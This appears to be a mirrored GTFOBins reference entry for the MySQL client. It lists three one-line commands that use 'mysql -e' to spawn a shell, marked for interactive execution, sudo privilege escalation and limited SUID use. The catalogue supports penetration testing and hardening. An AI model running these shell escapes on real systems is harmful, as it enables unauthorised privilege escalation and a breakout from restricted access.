1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-11 09:51:33 +01:00
GTFOBins.github.io/_gtfobins/mysql.md
2018-08-31 11:09:19 +02:00

236 B

description functions
A valid MySQL server must be available.
execute-interactive sudo-enabled suid-limited
code
mysql -e '! /bin/sh'
code
sudo mysql -e '! /bin/sh'
code
./mysql -e '! /bin/sh'